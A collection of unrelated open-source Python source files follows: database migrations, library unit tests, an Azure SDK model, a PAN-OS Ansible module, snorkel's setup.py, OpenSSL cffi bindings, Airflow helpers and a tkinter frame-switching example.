sa.Column('id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('suite_id', sa.GUID(), nullable=True),
sa.Column('parent_id', sa.GUID(), nullable=True),
sa.Column('name_sha', sa.String(length=40), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.Column('first_build_id', sa.GUID(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['first_build_id'], ['build.id'], ),
sa.ForeignKeyConstraint(['parent_id'], ['aggtestgroup.id'], ),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.ForeignKeyConstraint(['suite_id'], ['aggtestsuite.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint(
'project_id', 'suite_id', 'name_sha', name='unq_aggtestgroup_key')
)
op.create_index('idx_aggtestgroup_suite_id', 'aggtestgroup', ['suite_id'])
op.create_index('idx_aggtestgroup_parent_id', 'aggtestgroup', ['parent_id'])
op.create_index('idx_aggtestgroup_first_build_id', 'aggtestgroup', ['first_build_id'])
def downgrade():
op.drop_table('aggtestgroup')
op.drop_table('aggtestsuite')
|
tests/test_require_user.py | borisgrafx/client | 3,968 | 11195782 | """
require user tests.
"""
import pytest
import wandb
@pytest.fixture
def require_mock(mocker):
cleanup = []
def fn(require, func):
cleanup.append(require)
mocker.patch.object(
wandb.wandb_sdk.wandb_require._Requires,
"require_" + require,
func,
create=True,
)
yield fn
for require in cleanup:
wandb.__dict__.pop("require_" + require, None)
def test_require_single(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require("something")
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
assert "http://wandb.me/library-require" in captured.err
def test_require_list(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require(["something", "another"])
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
assert "unsupported requirement: another" in captured.err
def test_require_version(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require("something@beta")
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
def test_require_param(user_test, capsys):
with pytest.raises(wandb.errors.RequireError):
wandb.require("something:param@beta")
captured = capsys.readouterr()
assert "unsupported requirement: something" in captured.err
def test_require_good(user_test, require_mock):
def mock_require_test(self):
wandb.require_test = lambda x: x + 2
require_mock("test", mock_require_test)
wandb.require("test")
assert wandb.require_test(2) == 4
def test_require_require(user_test, require_mock):
# This is a noop now that it is "released"
wandb.require("require")
|
src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/verification_ip_flow_parameters_py3.py | Mannan2812/azure-cli-extensions | 207 | 11195789 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VerificationIPFlowParameters(Model):
"""Parameters that define the IP flow to be verified.
All required parameters must be populated in order to send to Azure.
:param target_resource_id: Required. The ID of the target resource to
perform next-hop on.
:type target_resource_id: str
:param direction: Required. The direction of the packet represented as a
5-tuple. Possible values include: 'Inbound', 'Outbound'
:type direction: str or ~azure.mgmt.network.v2018_04_01.models.Direction
:param protocol: Required. Protocol to be verified on. Possible values
include: 'TCP', 'UDP'
:type protocol: str or
~azure.mgmt.network.v2018_04_01.models.IpFlowProtocol
:param local_port: Required. The local port. Acceptable values are a
single integer in the range (0-65535). Support for * for the source port,
which depends on the direction.
:type local_port: str
:param remote_port: Required. The remote port. Acceptable values are a
single integer in the range (0-65535). Support for * for the source port,
which depends on the direction.
:type remote_port: str
:param local_ip_address: Required. The local IP address. Acceptable values
are valid IPv4 addresses.
:type local_ip_address: str
:param remote_ip_address: Required. The remote IP address. Acceptable
values are valid IPv4 addresses.
:type remote_ip_address: str
:param target_nic_resource_id: The NIC ID. (If VM has multiple NICs and IP
forwarding is enabled on any of them, then this parameter must be
specified. Otherwise optional).
:type target_nic_resource_id: str
"""
_validation = {
'target_resource_id': {'required': True},
'direction': {'required': True},
'protocol': {'required': True},
'local_port': {'required': True},
'remote_port': {'required': True},
'local_ip_address': {'required': True},
'remote_ip_address': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'direction': {'key': 'direction', 'type': 'str'},
'protocol': {'key': 'protocol', 'type': 'str'},
'local_port': {'key': 'localPort', 'type': 'str'},
'remote_port': {'key': 'remotePort', 'type': 'str'},
'local_ip_address': {'key': 'localIPAddress', 'type': 'str'},
'remote_ip_address': {'key': 'remoteIPAddress', 'type': 'str'},
'target_nic_resource_id': {'key': 'targetNicResourceId', 'type': 'str'},
}
def __init__(self, *, target_resource_id: str, direction, protocol, local_port: str, remote_port: str, local_ip_address: str, remote_ip_address: str, target_nic_resource_id: str=None, **kwargs) -> None:
super(VerificationIPFlowParameters, self).__init__(**kwargs)
self.target_resource_id = target_resource_id
self.direction = direction
self.protocol = protocol
self.local_port = local_port
self.remote_port = remote_port
self.local_ip_address = local_ip_address
self.remote_ip_address = remote_ip_address
self.target_nic_resource_id = target_nic_resource_id
|
tests/API0/testdateparam.py | mcepl/param | 123 | 11195791 | <reponame>mcepl/param<filename>tests/API0/testdateparam.py
"""
Unit test for Date parameters.
"""
import unittest
import datetime as dt
import param
class TestDateParameters(unittest.TestCase):
def test_initialization_out_of_bounds(self):
try:
class Q(param.Parameterized):
q = param.Date(dt.datetime(2017,2,27),
bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)))
except ValueError:
pass
else:
raise AssertionError("No exception raised on out-of-bounds date")
def test_set_out_of_bounds(self):
class Q(param.Parameterized):
q = param.Date(bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)))
try:
Q.q = dt.datetime(2017,2,27)
except ValueError:
pass
else:
raise AssertionError("No exception raised on out-of-bounds date")
def test_set_exclusive_out_of_bounds(self):
class Q(param.Parameterized):
q = param.Date(bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)),
inclusive_bounds=(True, False))
try:
Q.q = dt.datetime(2017,2,26)
except ValueError:
pass
else:
raise AssertionError("No exception raised on out-of-bounds date")
def test_get_soft_bounds(self):
q = param.Date(dt.datetime(2017,2,25),
bounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,26)),
softbounds=(dt.datetime(2017,2,1),
dt.datetime(2017,2,25)))
self.assertEqual(q.get_soft_bounds(), (dt.datetime(2017,2,1),
dt.datetime(2017,2,25)))
|
tests/integration/test_cmorize_obs.py | ESMValGroup/ESMValTool | 148 | 11195796 | <gh_stars>100-1000
"""Tests for the module :mod:`esmvaltool.cmorizers.obs.cmorize_obs`."""
import contextlib
import os
import sys
import iris
import numpy as np
import yaml
from cf_units import Unit
from esmvaltool.cmorizers.obs.cmorize_obs import main as run
@contextlib.contextmanager
def keep_cwd():
"""
Use a context manager since the cmorizer enters
and stays in the cmorization dir, risking to write
test outputs away from test-reports.
"""
curr_path = os.getcwd()
try:
yield
finally:
os.chdir(curr_path)
def write_config_user_file(dirname):
"""Replace config_user file values for testing."""
config_file = dirname / 'config-user.yml'
cfg = {
'output_dir': str(dirname / 'output_dir'),
'rootpath': {
'RAWOBS': str(dirname / 'raw_stuff'),
},
'log_level': 'debug',
}
config_file.write_text(yaml.safe_dump(cfg, encoding=None))
return str(config_file)
def _create_sample_cube(time_step):
"""Create a quick CMOR-compliant sample cube."""
coord_sys = iris.coord_systems.GeogCS(iris.fileformats.pp.EARTH_RADIUS)
cube_data = np.ones((1, 3, 2, 2))
cube_data[0, 1, 1, 1] = 22.
time = iris.coords.DimCoord([
time_step,
],
standard_name='time',
bounds=[[time_step - 0.5, time_step + 0.5]],
units=Unit('days since 0000-01-01',
calendar='gregorian'))
zcoord = iris.coords.DimCoord([0.5, 5., 50.],
var_name='depth',
standard_name='depth',
bounds=[[0., 2.5], [2.5, 25.], [25., 250.]],
units='m',
attributes={'positive': 'down'})
lons = iris.coords.DimCoord([1.5, 2.5],
standard_name='longitude',
bounds=[[1., 2.], [2., 3.]],
units='K',
coord_system=coord_sys)
lats = iris.coords.DimCoord([1.5, 2.5],
standard_name='latitude',
bounds=[[1., 2.], [2., 3.]],
units='K',
coord_system=coord_sys)
coords_spec = [(time, 0), (zcoord, 1), (lats, 2), (lons, 3)]
cube = iris.cube.Cube(cube_data, dim_coords_and_dims=coords_spec)
return cube
def put_dummy_data(data_path):
"""Create a small dummy netCDF file to be cmorized."""
for count, step in enumerate(np.arange(0.5, 12.5)):
mon = "{:02d}".format(count)
gen_cube = _create_sample_cube(step)
file_path = os.path.join(data_path,
"woa18_decav81B0_t" + mon + "_01.nc")
gen_cube.var_name = "t_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path,
"woa18_decav81B0_s" + mon + "_01.nc")
gen_cube.var_name = "s_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_o" + mon + "_01.nc")
gen_cube.var_name = "o_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_n" + mon + "_01.nc")
gen_cube.var_name = "n_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_p" + mon + "_01.nc")
gen_cube.var_name = "p_an"
iris.save(gen_cube, file_path)
file_path = os.path.join(data_path, "woa18_all_i" + mon + "_01.nc")
gen_cube.var_name = "i_an"
iris.save(gen_cube, file_path)
def check_log_file(log_file, no_data=False):
"""Check the cmorization log file."""
with open(log_file, 'r') as log:
if no_data:
msg = "Could not find raw data WOA"
else:
msg = "Fixing data"
assert any(msg in line for line in log)
def check_output_exists(output_path):
"""Check if cmorizer outputted."""
# eg Tier2/WOA/OBS6_WOA_clim_2018_Omon_thetao_200001-200012.nc
output_files = os.listdir(output_path)
assert len(output_files) == 8
assert 'OBS6_WOA_clim' in output_files[0]
out_files = [s.split("_")[5] for s in output_files]
assert 'thetao' in out_files
assert 'so' in out_files
assert 'no3' in out_files
assert 'po4' in out_files
assert 'o2' in out_files
assert 'si' in out_files
assert 'sos' in out_files
assert 'tos' in out_files
def check_conversion(output_path):
"""Check basic cmorization."""
cube = iris.load_cube(os.path.join(output_path,
os.listdir(output_path)[0]))
assert cube.coord("time").units == Unit('days since 1950-1-1 00:00:00',
calendar='gregorian')
assert cube.coord("latitude").units == 'degrees'
@contextlib.contextmanager
def arguments(*args):
"""Arrange contextmanager."""
backup = sys.argv
sys.argv = list(args)
yield
sys.argv = backup
def test_cmorize_obs_woa_no_data(tmp_path):
"""Test for example run of cmorize_obs command."""
config_user_file = write_config_user_file(tmp_path)
os.makedirs(os.path.join(tmp_path, 'raw_stuff', 'Tier2'))
with keep_cwd():
with arguments(
'cmorize_obs',
'-c',
config_user_file,
'-o',
'WOA',
):
run()
log_dir = os.path.join(tmp_path, 'output_dir')
log_file = os.path.join(log_dir,
os.listdir(log_dir)[0], 'run', 'main_log.txt')
check_log_file(log_file, no_data=True)
def test_cmorize_obs_woa_data(tmp_path):
"""Test for example run of cmorize_obs command."""
config_user_file = write_config_user_file(tmp_path)
os.makedirs(os.path.join(tmp_path, 'raw_stuff'))
data_path = os.path.join(tmp_path, 'raw_stuff', 'Tier2', 'WOA')
os.makedirs(data_path)
put_dummy_data(data_path)
with keep_cwd():
with arguments(
'cmorize_obs',
'-c',
config_user_file,
'-o',
'WOA',
):
run()
log_dir = os.path.join(tmp_path, 'output_dir')
log_file = os.path.join(log_dir,
os.listdir(log_dir)[0], 'run', 'main_log.txt')
check_log_file(log_file, no_data=False)
output_path = os.path.join(log_dir, os.listdir(log_dir)[0], 'Tier2', 'WOA')
check_output_exists(output_path)
check_conversion(output_path)
|
tools/Polygraphy/polygraphy/tools/args/util/util.py | KaliberAI/TensorRT | 5,249 | 11195810 | <filename>tools/Polygraphy/polygraphy/tools/args/util/util.py
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from polygraphy import constants, mod, util
from polygraphy.common import TensorMetadata
from polygraphy.logger import G_LOGGER, LogMode
from polygraphy.tools.script import Script, ensure_safe, inline, safe
np = mod.lazy_import("numpy")
@mod.export()
def cast(val):
"""
Cast a value from a string to one of:
[int, float, str, List[int], List[float], List[str]]
Args:
val (str): The value to cast.
Returns:
object: The casted value.
"""
val = str(val.strip())
if val.strip("[]") != val:
return [cast(elem) for elem in val.strip("[]").split(",")]
try:
return int(val) # This fails for float strings like '0.0'
except:
pass
try:
return float(val) # This fails for non-numerical strings like 'isildur'
except:
pass
return val.strip("\"'")
@mod.export()
def run_script(script_func, *args):
"""
Populates a script using the provided callable, then returns
the variable indicated by the return value of the callable.
Args:
script_func (Callable(Script, *args) -> str):
A callable that populates a Script and then returns
the name of an object defined within the script to retrieve.
args:
Additional positional argruments to pass to script_func.
The script_func should accept these by variable name instead
of taking the values themselves. Values of ``None`` will be
passed directly instead of by variable name.
Returns:
object:
An object defined within the script, or ``None`` if it is not
defined by the script.
"""
script = Script()
arg_names = []
for index, arg in enumerate(args):
if arg is not None:
arg_name = safe("__arg{:}", index)
locals()[arg_name.unwrap()] = arg
arg_names.append(inline(arg_name))
else:
arg_names.append(None)
safe_ret_name = script_func(script, *arg_names)
exec(str(script), globals(), locals())
if safe_ret_name is not None:
ret_name = ensure_safe(safe_ret_name).unwrap()
if ret_name in locals():
return locals()[ret_name]
return None
@mod.export()
def get(args, attr, default=None):
"""
Gets a command-line argument if it exists, otherwise returns a default value.
Args:
args: The command-line arguments.
attr (str): The name of the command-line argument.
default (obj): The default value to return if the argument is not found. Defaults to None.
"""
if hasattr(args, attr):
return getattr(args, attr)
return default
@mod.export()
def get_outputs(args, name):
outputs = get(args, name)
if outputs is not None and len(outputs) == 2 and outputs == ["mark", "all"]:
outputs = constants.MARK_ALL
return outputs
@mod.export()
def get_outputs_for_script(script, outputs):
if outputs == constants.MARK_ALL:
script.add_import(["constants"], frm="polygraphy")
outputs = inline(safe("constants.MARK_ALL"))
return outputs
def np_types():
"""
Returns a list of human-readable names of NumPy data types.
"""
return sorted(set(np.dtype(dtype).name for dtype in np.sctypeDict.values()))
def np_type_from_str(dt_str):
"""
Converts a string representation of a data type to a NumPy data type.
Args:
dt_str (str): The string representation of the data type.
Returns:
np.dtype: The NumPy data type.
Raises:
KeyError: If the provided string does not correspond to a NumPy data type.
"""
try:
return {np.dtype(dtype).name: np.dtype(dtype) for dtype in np.sctypeDict.values()}[dt_str]
except KeyError:
G_LOGGER.error(
"Could not understand data type: {:}. Did you forget to specify a data type? "
"Please use one of: {:} or `auto`.".format(dt_str, np_types())
)
raise
@mod.export()
def parse_dict_with_default(arg_lst, cast_to=None, sep=None):
"""
Generate a dictionary from a list of arguments of the form:
``<key>:<val>``. If ``<key>`` is empty, the value will be assigned
to an empty string key in the returned mapping.
Args:
arg_lst (List[str]):
The arguments to map.
cast_to (type):
The type to cast the values in the map. By default,
uses the type returned by ``cast``.
sep (str):
The separator between the key and value strings.
Returns:
Dict[str, obj]: The mapping.
"""
sep = util.default(sep, ":")
if arg_lst is None:
return
arg_map = {}
for arg in arg_lst:
key, _, val = arg.rpartition(sep)
val = cast(val)
if cast_to:
val = cast_to(val)
arg_map[key] = val
return arg_map
@mod.deprecate(
remove_in="0.35.0",
use_instead=": as a separator and write shapes in the form [dim0,...,dimN]",
name="Using , as a separator",
)
def parse_meta_legacy(meta_args, includes_shape=True, includes_dtype=True):
"""
Parses a list of tensor metadata arguments of the form "<name>,<shape>,<dtype>"
`shape` and `dtype` are optional, but `dtype` must always come after `shape` if they are both enabled.
Args:
meta_args (List[str]): A list of tensor metadata arguments from the command-line.
includes_shape (bool): Whether the arguments include shape information.
includes_dtype (bool): Whether the arguments include dtype information.
Returns:
TensorMetadata: The parsed tensor metadata.
"""
SEP = ","
SHAPE_SEP = "x"
meta = TensorMetadata()
for orig_tensor_meta_arg in meta_args:
tensor_meta_arg = orig_tensor_meta_arg
def pop_meta(name):
nonlocal tensor_meta_arg
tensor_meta_arg, _, val = tensor_meta_arg.rpartition(SEP)
if not tensor_meta_arg:
G_LOGGER.critical(
"Could not parse {:} from argument: {:}. Is it separated by a comma "
"(,) from the tensor name?".format(name, orig_tensor_meta_arg)
)
if val.lower() == "auto":
val = None
return val
def parse_dtype(dtype):
if dtype is not None:
dtype = np_type_from_str(dtype)
return dtype
def parse_shape(shape):
if shape is not None:
def parse_shape_dim(buf):
try:
buf = int(buf)
except:
pass
return buf
parsed_shape = []
# Allow for quoted strings in shape dimensions
in_quotes = False
buf = ""
for char in shape.lower():
if char in ['"', "'"]:
in_quotes = not in_quotes
elif not in_quotes and char == SHAPE_SEP:
parsed_shape.append(parse_shape_dim(buf))
buf = ""
else:
buf += char
# For the last dimension
if buf:
parsed_shape.append(parse_shape_dim(buf))
shape = tuple(parsed_shape)
return shape
name = None
dtype = None
shape = None
if includes_dtype:
dtype = parse_dtype(pop_meta("data type"))
if includes_shape:
shape = parse_shape(pop_meta("shape"))
name = tensor_meta_arg
meta.add(name, dtype, shape)
new_style = []
for m_arg in meta_args:
arg = m_arg
if includes_shape:
arg = arg.replace(",", ":[", 1)
if includes_dtype:
arg = arg.replace(",", "]:", 1)
else:
arg += "]"
arg = arg.replace(",auto", ":auto")
arg = arg.replace(",", ":")
if includes_shape:
arg = arg.replace("x", ",")
new_style.append(arg)
G_LOGGER.warning(
"The old shape syntax is deprecated and will be removed in a future version of Polygraphy\n"
"See the CHANGELOG for the motivation behind this deprecation.",
mode=LogMode.ONCE,
)
G_LOGGER.warning("Instead of: '{:}', use: '{:}'\n".format(" ".join(meta_args), " ".join(new_style)))
return meta
def parse_meta_new_impl(meta_args, includes_shape=True, includes_dtype=True):
SEP = ":"
meta = TensorMetadata()
for meta_arg in meta_args:
name, shape, dtype = None, None, None
def pop_meta(func):
nonlocal meta_arg
meta_arg, _, val = meta_arg.rpartition(SEP)
val = cast(val.strip())
if isinstance(val, str) and val.lower() == "auto":
return None
return func(val)
if includes_dtype:
dtype = pop_meta(func=np_type_from_str)
if includes_shape:
shape = pop_meta(func=lambda s: tuple(e for e in s if e != ""))
name = meta_arg
meta.add(name, dtype=dtype, shape=shape)
return meta
@mod.export()
def parse_meta(meta_args, includes_shape=True, includes_dtype=True):
"""
Parses a list of tensor metadata arguments of the form "<name>:<shape>:<dtype>"
`shape` and `dtype` are optional, but `dtype` must always come after `shape` if they are both enabled.
Args:
meta_args (List[str]): A list of tensor metadata arguments from the command-line.
includes_shape (bool): Whether the arguments include shape information.
includes_dtype (bool): Whether the arguments include dtype information.
Returns:
TensorMetadata: The parsed tensor metadata.
"""
if all((includes_shape and "[" in arg) or (includes_dtype and "," not in arg) for arg in meta_args):
return parse_meta_new_impl(meta_args, includes_shape, includes_dtype)
return parse_meta_legacy(meta_args, includes_shape, includes_dtype)
@mod.export()
def parse_num_bytes(num_bytes_arg):
"""
Parses an argument that indicates a number of bytes. The argument may use scientific notation,
or contain a `K`, `M`, or `G` suffix (case-insensitive), indicating `KiB`, `MiB`, or `GiB` respectively.
If the number is fractional, it will be truncated to the nearest integer value.
If the provided argument is `None`, `None` is returned.
Args:
num_bytes_arg (str): The argument indicating the number of bytes.
Returns:
int: The number of bytes.
"""
if num_bytes_arg is None:
return None
num_component = num_bytes_arg # Numerical component of the argument
multiplier = 1
suffix_mulitplier = {"K": 1 << 10, "M": 1 << 20, "G": 1 << 30}
for suffix, mult in suffix_mulitplier.items():
if num_bytes_arg.upper().endswith(suffix):
num_component = num_bytes_arg.upper().rstrip(suffix)
multiplier = mult
break
try:
return int(float(num_component) * multiplier)
except:
G_LOGGER.critical(
"Could not convert {:} to a number of bytes. "
"Please use either an integer (e.g. 16000000), scientific notation (e.g. 16e6), "
"or a number with a valid suffix: K, M, or G (e.g. 16M).".format(num_bytes_arg)
)
|
plugins/modules/panos_log_forwarding_profile.py | EverOps/pan-os-ansible | 130 | 11195822 | <gh_stars>100-1000
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
---
module: panos_log_forwarding_profile
short_description: Manage log forwarding profiles.
description:
- Manages log forwarding profiles.
author: "<NAME> (@shinmog)"
version_added: '1.0.0'
requirements:
- pan-python
- pandevice >= 0.11.1
notes:
- Panorama is supported.
- Check mode is supported.
extends_documentation_fragment:
- paloaltonetworks.panos.fragments.transitional_provider
- paloaltonetworks.panos.fragments.vsys_shared
- paloaltonetworks.panos.fragments.device_group
- paloaltonetworks.panos.fragments.state
options:
name:
description:
- Name of the profile.
type: str
required: true
description:
description:
- Profile description
type: str
enhanced_logging:
description:
- Valid for PAN-OS 8.1+
- Enabling enhanced application logging.
type: bool
"""
EXAMPLES = """
# Create a profile
- name: Create log forwarding profile
panos_log_forwarding_profile:
provider: '{{ provider }}'
name: 'my-profile'
enhanced_logging: true
"""
RETURN = """
# Default return values
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.paloaltonetworks.panos.plugins.module_utils.panos import (
get_connection,
)
try:
from panos.errors import PanDeviceError
from panos.objects import LogForwardingProfile
except ImportError:
try:
from pandevice.errors import PanDeviceError
from pandevice.objects import LogForwardingProfile
except ImportError:
pass
def main():
helper = get_connection(
vsys_shared=True,
device_group=True,
with_state=True,
with_classic_provider_spec=True,
min_pandevice_version=(0, 11, 1),
min_panos_version=(8, 0, 0),
argument_spec=dict(
name=dict(required=True),
description=dict(),
enhanced_logging=dict(type="bool"),
),
)
module = AnsibleModule(
argument_spec=helper.argument_spec,
supports_check_mode=True,
required_one_of=helper.required_one_of,
)
# Verify imports, build pandevice object tree.
parent = helper.get_pandevice_parent(module)
try:
listing = LogForwardingProfile.refreshall(parent)
except PanDeviceError as e:
module.fail_json(msg="Failed refresh: {0}".format(e))
spec = {
"name": module.params["name"],
"description": module.params["description"],
"enhanced_logging": module.params["enhanced_logging"],
}
obj = LogForwardingProfile(**spec)
parent.add(obj)
changed, diff = helper.apply_state(obj, listing, module)
module.exit_json(changed=changed, diff=diff, msg="Done")
if __name__ == "__main__":
main()
|
setup.py | melonwater211/snorkel | 2,323 | 11195847 | <filename>setup.py
from typing import Dict
from setuptools import find_packages, setup
# version.py defines the VERSION and VERSION_SHORT variables.
# We use exec here so we don't import snorkel.
VERSION: Dict[str, str] = {}
with open("snorkel/version.py", "r") as version_file:
exec(version_file.read(), VERSION)
# Use README.md as the long_description for the package
with open("README.md", "r") as readme_file:
long_description = readme_file.read()
setup(
name="snorkel",
version=VERSION["VERSION"],
url="https://github.com/snorkel-team/snorkel",
description="A system for quickly generating training data with weak supervision",
long_description_content_type="text/markdown",
long_description=long_description,
license="Apache License 2.0",
classifiers=[
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Information Analysis",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
],
project_urls={
"Homepage": "https://snorkel.org",
"Source": "https://github.com/snorkel-team/snorkel/",
"Bug Reports": "https://github.com/snorkel-team/snorkel/issues",
"Citation": "https://doi.org/10.14778/3157794.3157797",
},
packages=find_packages(exclude=("test*",)),
include_package_data=True,
install_requires=[
"munkres>=1.0.6",
"numpy>=1.16.5,<1.20.0",
"scipy>=1.2.0,<2.0.0",
"pandas>=1.0.0,<2.0.0",
"tqdm>=4.33.0,<5.0.0",
"scikit-learn>=0.20.2,<0.25.0",
"torch>=1.2.0,<2.0.0",
"tensorboard>=2.0.0,<2.7.0",
"networkx>=2.2,<2.6",
],
python_requires=">=3.6",
keywords="machine-learning ai weak-supervision",
)
|
lib_pypy/_cffi_ssl/_cffi_src/openssl/nid.py | nanjekyejoannah/pypy | 333 | 11195857 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/obj_mac.h>
"""
TYPES = """
static const int Cryptography_HAS_X25519;
static const int Cryptography_HAS_X448;
static const int Cryptography_HAS_ED448;
static const int Cryptography_HAS_ED25519;
static const int Cryptography_HAS_POLY1305;
static const int NID_undef;
static const int NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
static const int NID_X25519;
static const int NID_X448;
static const int NID_ED25519;
static const int NID_ED448;
static const int NID_poly1305;
static const int NID_X9_62_prime256v1;
static const int NID_info_access;
static const int NID_subject_alt_name;
static const int NID_crl_distribution_points;
static const int NID_crl_reason;
static const int NID_ad_OCSP;
static const int NID_ad_ca_issuers;
"""
FUNCTIONS = """
"""
CUSTOMIZATIONS = """
#ifndef NID_X25519
static const long Cryptography_HAS_X25519 = 0;
static const int NID_X25519 = 0;
#else
static const long Cryptography_HAS_X25519 = 1;
#endif
#ifndef NID_ED25519
static const long Cryptography_HAS_ED25519 = 0;
static const int NID_ED25519 = 0;
#else
static const long Cryptography_HAS_ED25519 = 1;
#endif
#ifndef NID_X448
static const long Cryptography_HAS_X448 = 0;
static const int NID_X448 = 0;
#else
static const long Cryptography_HAS_X448 = 1;
#endif
#ifndef NID_ED448
static const long Cryptography_HAS_ED448 = 0;
static const int NID_ED448 = 0;
#else
static const long Cryptography_HAS_ED448 = 1;
#endif
#ifndef NID_poly1305
static const long Cryptography_HAS_POLY1305 = 0;
static const int NID_poly1305 = 0;
#else
static const long Cryptography_HAS_POLY1305 = 1;
#endif
"""
|
dags/utils.py | Akash-Dutta/DataEngineering | 190 | 11195858 | <filename>dags/utils.py
import os
from airflow.hooks.S3_hook import S3Hook
from airflow.hooks.postgres_hook import PostgresHook
import psycopg2
def _local_to_s3(
bucket_name: str, key: str, file_name: str, remove_local: bool = False
) -> None:
s3 = S3Hook()
s3.load_file(filename=file_name, bucket_name=bucket_name, replace=True, key=key)
if remove_local:
if os.path.isfile(file_name):
os.remove(file_name)
def run_redshift_external_query(qry: str) -> None:
rs_hook = PostgresHook(postgres_conn_id="redshift")
rs_conn = rs_hook.get_conn()
rs_conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
rs_cursor = rs_conn.cursor()
rs_cursor.execute(qry)
rs_cursor.close()
rs_conn.commit()
|
tests/foundations/environments/test_plan.py | IuryAlves/cloud-foundation-fabric | 203 | 11195876 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_folder_roles(e2e_plan_runner):
"Test folder roles."
modules, _ = e2e_plan_runner(FIXTURES_DIR, refresh=False)
for env in ['test', 'prod']:
resources = modules[f'module.test.module.environment-folders["{env}"]']
folders = [r for r in resources if r['type'] == 'google_folder']
assert len(folders) == 1
folder = folders[0]
assert folder['values']['display_name'] == env
bindings = [r['index']
for r in resources if r['type'] == 'google_folder_iam_binding']
assert len(bindings) == 5
def test_org_roles(e2e_plan_runner):
"Test folder roles."
tf_vars = {
'organization_id': 'organizations/123',
'iam_xpn_config': '{grant = true, target_org = true}'
}
modules, _ = e2e_plan_runner(FIXTURES_DIR, refresh=False, **tf_vars)
for env in ['test', 'prod']:
resources = modules[f'module.test.module.environment-folders["{env}"]']
folder_bindings = [r['index']
for r in resources if r['type'] == 'google_folder_iam_binding']
assert len(folder_bindings) == 4
resources = modules[f'module.test.module.tf-service-accounts["{env}"]']
org_bindings = [r for r in resources
if r['type'] == 'google_organization_iam_member']
assert len(org_bindings) == 2
assert {b['values']['role'] for b in org_bindings} == {
'roles/resourcemanager.organizationViewer',
'roles/compute.xpnAdmin'
}
|
tkinter/__frame__/replace-frame-with-content/main-v2-lambda.py | whitmans-max/python-examples | 140 | 11195884 | <gh_stars>100-1000
# date: 2019.05.04
# author: Bartłomiej 'furas' Burek
import tkinter as tk
# --- functions ---
def change_frame(new_frame):
global current
# hide current tk.Frame
current.pack_forget()
# show new tk.Frame
current = new_frame
current.pack()
# --- main ---
root = tk.Tk()
# --- main frame without .pack() ---
main_frame = tk.Frame(root)
button = tk.Button(main_frame, text="Frame #1", command=lambda:change_frame(frame_1))
button.pack()
button = tk.Button(main_frame, text="Frame #2", command=lambda:change_frame(frame_2))
button.pack()
# --- frame #1 without .pack() ---
frame_1 = tk.Frame(root)
l = tk.Label(frame_1, text="It is Frame #1", bg='red')
l.pack()
b = tk.Button(frame_1, text="BACK", command=lambda:change_frame(main_frame))
b.pack()
# --- frame #2 without .pack() ---
frame_2 = tk.Frame(root)
l = tk.Label(frame_2, text="It is Frame #2", bg='green')
l.pack()
b = tk.Button(frame_2, text="BACK", command=lambda:change_frame(main_frame))
b.pack()
# --- set frame at start ---
